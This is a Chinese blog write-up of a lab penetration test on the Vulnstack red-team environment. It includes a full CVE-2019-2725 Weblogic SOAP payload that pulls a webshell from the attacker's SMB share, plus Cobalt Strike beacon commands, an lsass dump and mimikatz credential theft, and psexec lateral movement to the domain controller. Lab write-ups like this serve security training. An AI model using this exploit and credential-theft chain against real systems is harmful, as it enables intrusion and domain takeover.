[渗透测试]Vulnstack 红队(二)

最新推荐文章于 2024-07-04 11:22:20 发布
最新推荐文章于 2024-07-04 11:22:20 发布
阅读量2.2k 收藏 1
点赞数 6
分类专栏: 渗透测试实战 文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/122852298
版权
本文详细介绍了利用Weblogic的CVE-2019-2725漏洞进行攻击的步骤,包括使用nmap扫描、WeblogicScan工具检测、上传webshell、执行POC以及利用冰蝎进行域渗透。在成功获取权限后,进一步通过CS工具收集域用户信息,并最终拿下域控制器。整个过程展示了网络攻防中的漏洞利用和域控接管技术。
摘要由CSDN通过智能技术生成

域环境初始化

DC
IP:10.10.10.10  OS:Windows 2012(64)
应用:AD域

WEB
IP1:10.10.10.80  IP2:192.168.111.80  OS:Windows 2008(64)
应用:Weblogic 10.3.6  MSSQL 2008

PC
IP1:10.10.10.201  IP2:192.168.111.201  OS:Windows 7(32)
应用:

攻击机
IP:192.168.111.5 OS:Kali

weblogic漏洞利用

nmap扫描

nmap -p- -T5 192.168.111.80 -o web

-p- 表示扫描所有端口;

-T5 指定扫描过程使用的时序,总共有6个级别(0-5),级别越高,扫描速度越快,但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况较好的情况下推荐使用T4。

-o 保存扫描结果到文件web

image-20220124232258229

常用端口是开放状态1433是mssql,7001我们知道是weblogic服务,因为我们前面手工开启的。

考虑weblogic服务漏洞,找到WeblogicScan工具扫一下。

工具链接

python3 WeblogicScan.py -u 192.168.111.80 -p 7001

image-20220125004053662

发现一个漏洞

CVE-2019-2725漏洞描述:这是一个Weblogic反序列化远程代码执行漏洞。部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。

启动smbserver共享文件服务

我们需要先把/root/Behinder/server/shell.jsp webshell木马程序上传weblogic服务器上。然后再使用冰蝎连接shell.jsp木马程序。

impacket-smbserver  share /root/桌面/Behinder/server &

POC:

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.111.80:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 841
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>copy \\192.168.111.5\share\shell.jsp servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\1.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

发包:

image-20220126120909101

202状态码:Accepted 表示服务器端已经收到请求消息,但是尚未进行处理。但是对于请求的处理却是无保证的,即稍后无法通过 HTTP 协议给客户端发送一个异步请求来告知其请求的处理结果。这个状态码被设计用来将请求交由另外一个进程或者服务器来进行处理,或者是对请求进行批处理的情形。

问题:发现无法访问共享的文件

使用漏洞利用工具上传shell

上传冰蝎的马

image-20220128134108137

启动冰蝎

java -jar Behinder_v3.0_Beta6_linux.jar &

image-20220126173529186

冰蝎连接

URL:http://192.168.111.80:7001/_async/shell.jsp
密码:rebeyond

image-20220128134239677

连接成功

域渗透

CS上线

启动cs服务器,密码是123456

./teamserver 192.168.111.5 123456  &

启动客户端

./start.sh &

image-20220128141033650

接下来创建一个监听器

image-20220128172835859

在Attacks中选择

image-20220128173049397

选择之后保存,再利用冰蝎上传这个exe文件

image-20220128173751479

接下来在虚拟终端中运行这个程序即可

打开会话,将命令执行周期修改为2s

image-20220128174122183

查看当前用户身份,为admin账户

image-20220128174403999

使用 procdump64+mimikatz 获取 win 用户明文密码

procdump64.exe介绍:它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因。

lsass.exe进程概述:lsass.exe是一个系统进程,用于微软Windows系统的安全机制。它用于本地安全和登陆策略。也就是说lsass.exe进程运行后,里面会保存用户帐号和密码信息。

beacon> shell procdump64.exe -accepteula -ma lsass.exe lsass.dmp

参数说明:

-accepteula参数:指定是否自动接受 Microsoft 软件许可条款。所有无人参与安装都需要此设置。
-ma 参数:生成full dump, 即包括进程的所有内存. 默认的dump格式包括线程和句柄信息.

解密,这里数字卫士没有拦击并不说明 mimikatz 是免杀的,实际环境如果 mimikatz 不是免杀的需 要将 lsass.dmp 文件拖回本地放至相同的系统中进行解密。

shell mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"  "exit"> password.txt

直接使用 download 命令下载,下载后会保存到程序目录的 downloads 目录。

使用CS进行凭据搜集

hashdump
logonpasswords

image-20220128175728739

目前得到域用户信息:

域用户名:de1ay\mssql            密码:1qaz@WSX

域用户名:de1ay\administrator    密码:1qaz@WSX   #这是DC域管理员用户和密码

本地用户名:WEB\de1ay           密码:1qaz@WSX   该用户是系统本地登录系统用的。

获取域控

查看网络信息找到域控

beacon> shell ipconfig /all

image-20220128180341140

DNS 服务器 10.10.10.10 也就是域控。 查看域控制器

beacon> shell net group "domain controllers" /domain

获得:

主机名:DC,完整主机是:DC.de1ay.com
再确认主机名为DC的IP地址:
beacon> shell ping dc  
或:beacon> shell ping DC

成功ping通

image-20220128181038516

接下来查看域管理员

shell net group "domain admins" /domain

连接域控服务器-反弹域控shell

回到控制目标主机的初始用户账户下

beacon> rev2self

查看当前的权限:

beacon> getuid

通过前面获取到的DC的DE1AY\administrator账户信息,生成新的凭证。

beacon> make_token DE1AY\administrator 1qaz@WSX

创建新的监听实现中转,便于通过命名管道 psexec 通过 SMB Listener 横向过去。

image-20220128181744129

名称就叫smb这个后面要用。

DC上线,jump会使用前面的凭证和smb监听器,完成登录DC的过程

beacon> jump psexec DC smb
 
或:jump psexec 10.10.10.10 smb #目标机器可以是 DC 主机名,也可以是 IP

image-20220128182313560

拿下域控

image-20220128182404644

Snakin_ya
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试流程与内网渗透测试实战
悦分享
07-15 7235
关于免杀,我使用的全部是msf的编码自免杀,64位使用的是x64/zutto_dekiru,32位使用的是x86/shikata_ga_nai,360都没有拦截。虽然靶机中有360,但是我直接上传的mimikatz也没有被杀,所以我有些怀疑是360的版本比较低,除了web服务器上传的第一个payload,其它都进行了编码处理,而第一个也确实没有执行成功,这说明360至少对第一个payload是拦截了的。
[VulnStack] ATT&CK实战系列—红队实战(
weixin_45605352的博客
08-27 1374
0x00 环境搭建 靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX 配置网卡,仅主机模式192.168.10.0网段模拟内网,192.
[渗透测试]ATT&CK实战 | Vulnstack 红队
Y4tacker的博客
12-06 1897
文章目录环境来源为什么写这篇文章配置nmap扫描启动smbserver共享文件服务打爆weblogic提权使用 procdump64+mimikatz 获取 win 用户明文密生成管理帐号密码用户凭证-连接域控服务器-反弹域控 shel参考文章 环境来源 来源于https://mp.weixin.qq.com/s/uLlWJdcAc6MmUyuruHygNA,尊重人家作者,还是自己去问人家要吧 为什么写这篇文章 给一些不必要细节删除,以及一些自己觉得细节的补充 配置 nmap扫描 常用端口是开放状态1
Mimikatz的18种免杀姿势及防御策略
最新发布
2301_76786857的博客
07-04 183
本文主要介绍了如下5类免杀方式,共18种免杀方法。本文虽然是针对Mimiktaz进行免杀,但更多的是想研究学习一下比较通用的exe的免杀方式,比如文中介绍的exe通用加载器、powershell执行exe、白名单加载exe等有几种方法可以适用于任意的exe免杀,如果只是针对mimikatz进行免杀完全没必要这么啰嗦的。1、源码免杀。在有源码的情况下,可以定位特征码、加花指令、多层跳转、加无效指令、替换api、重写api、API伪调用等等,这部分内容较多略复杂,打算另写一篇进行介绍,本文不多介绍。
vulstack红队评估()
PANDA墨森的博客
06-20 1562
一、环境搭建: 1、根据作者公开的靶机信息整理: 靶场统一登录密码:1qaz@WSX 2、网络环境配置: ①Win2008双网卡模拟内外网: 外网:192.168.1.80,桥接模式与物理机相通 内网:10.10.10.80,仅主机模式 ②PC-win7只有内网: 内网:10.10.10.201,仅主机模式 ③win2012-DC只有内网: 内网:10.10.10.10,仅主机模式 启动web服务: 运行C:\Oracle\Middleware\u...
渗透靶场--vulnstack-红队评估实战(2)
weixin_45794666的博客
07-20 1654
vulnstack-红队评估实战(2) 环境配置 攻击者: kali 192.168.154.129 windows 192.168.154.1 靶场: WEB:对外边界服务器 10.10.10.80 192.168.154.80 PC:域成员 192.168.154.201 10.10.10.201 DC:域控 10.10.10.10 1.外网主机信息搜集 nmap 扫描web服务器端口 发现开放了80和7001 80无内容,7001weblogic版本为10.3.6.0 直接上工具获得权限代
红日安全vulnstack-ATT&CK实战系列 红队实战()
遇事不决冲冲冲
02-05 6516
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX
vulnstack1--红队靶机(域渗透)
tlovejr的博客
04-27 4093
一、前言 这几天一直有点任务,就一直没来得更新,现在继续给大家更新一些贴近真实情况的靶场环境,今天的文章或许会有点长,因为有好多和我一样的小白,所以在这就多墨迹几句,有什么不对的还请大佬们给予批评指正 、靶场前准备 首先做靶场前先需要做一些准备 1、下载靶场镜像文件 这步就没什么过多介绍的 链接:https://pan.baidu.com/s/1lElVlUfEovffRWWOCktdVQ?pwd=6666 提取码:6666 2、修改各个靶机登录密码 因为第一次登录不修改密码的话,第次开机时,原
红日靶场五(vulnstack5)渗透分析
rysehsf的博客
10-25 162
上线cs,发现为heart用户,管理员权限,svc提权到system,抓取hash和明文,没有发现有用的域用户信息。这里配置的原因是让kali可以访问win7,win7访问不了kali,模拟win7外网的环境和kali内网的环境。将kali通过frp到vps端口,并生成免杀exe,蚁剑上传执行。这里dc不出网,fscan扫描到开启了445端口,直接smb上线。访问80页面发现一个thinkphp框架的首页,工具扫描RCE。开启socks代理,通过fscan扫描内网111网段。
红日内网渗透靶场vulnstack2
snowlyzz的博客
09-20 1138
红日渗透学习
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 1030
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
Server_JDBC_Driver_20_EULA_CHS
04-06
Server_JDBC_Driver_20_EULA_CHS
2014.7月最新面杀mimikatz 2.0
07-10
2014年7月最新免杀mimikatz 2.0,过世界主流杀毒软件 支持windows 2008 R2和windows 2012
CS-Loader:CS免杀
03-22
CS-避免杀人 CS免杀,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常 V1.0:目前测试可以过Defender /火绒的静杀+动杀,360还没测= =不想装360全家桶了,可以自行测试 下一步开发计划: V1.5:加入C版本CS免杀(已完成) V1.7:加入Powershell的免杀(已完成) V2.0:开发出UI界面 V2.0:开发成在线免杀平台(已完成) PS:在实际使用中发现图形化界面不利于和其他工具结合,引用之下命令行的方式更具有扩展性 关于自己写的在线免杀平台,暂不考虑开源,主要是觉得当前的技术还比较薄弱,如果有师傅想体验可以联系我 V3.0:想办法结合更多免杀技术(想去研究下进程注入/文件捆绑,不知道免杀效果怎样) V3.1增加了go版本(可过火绒/ 360 / defender) 依赖环境 Pyt
vulnstack-ATT&CK实战系列 红队实战(一)
qq_41755084的博客
02-21 455
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟 ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实 APT 实战环境,从实战中成长。虚拟机所有统一密码:hongrisec@2019漏洞详情 (qiyuanxuetang.net)
2024年最新Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场(1)
2401_84297265的博客
05-03 1634
该内网靶场的渗透实验,大概得折腾了我整整 3-4 天才做完(而且各种攻击不畅……),其中 Win7 跳板机执行域命令频繁报错如下(各种百度解决方案均行不通,如有知情大佬请赐教,感激不尽……
[渗透测试]Vulnstack 红队(一)
cosmoslin的博客
02-08 2193
官方描述 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec@2019 域环境初始化 攻击机: kali ip:192.168.111.5 靶机: win7 外网ip:192.168.111.6 内网ip:192.168.52.14
牛!渗透大佬用14个部分讲明白Kail Linux渗透测试
javagty6778的博客
03-07 126
本手册致力于介绍如何使用Kail Linux对网络、系统、应用执行渗透测试渗透测试可以模拟内部或外部的恶意攻击者对网络或系统进行的 攻击。不同于漏洞评估,渗透测试包括漏洞利用阶段。因此,漏洞是存在的,而且如果不采取相应的措施将会有很大风险。在本手册中,“渗透测试人员”“攻击者”和“黑客”使用完全相同的技术 及工具评估网络和数据系统的安全性。他们之间唯一的区别是他们的目标——数据网络的安全或数据的外泄。
Docker最全教程——数据库容器化(十一)
dotNET跨平台
01-13 320
终于按时完成第篇。本来准备着手讲一些实践,但是数据库部分没有讲到,部分实践会存在一些问题,于是就有了此篇以及后续——数据库容器化。本篇将从SQL Server容器化实践...
"网络安全渗透测试红队行动概述
他们可能使用各种方式,包括社会工程学、渗透测试、应用程序漏洞利用等等。通过实施这些攻击,红队可以评估目标系统和网络的安全性,并发现其中的漏洞。 5.权限提升:一旦红队成功进入目标系统,他们会尝试提升权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值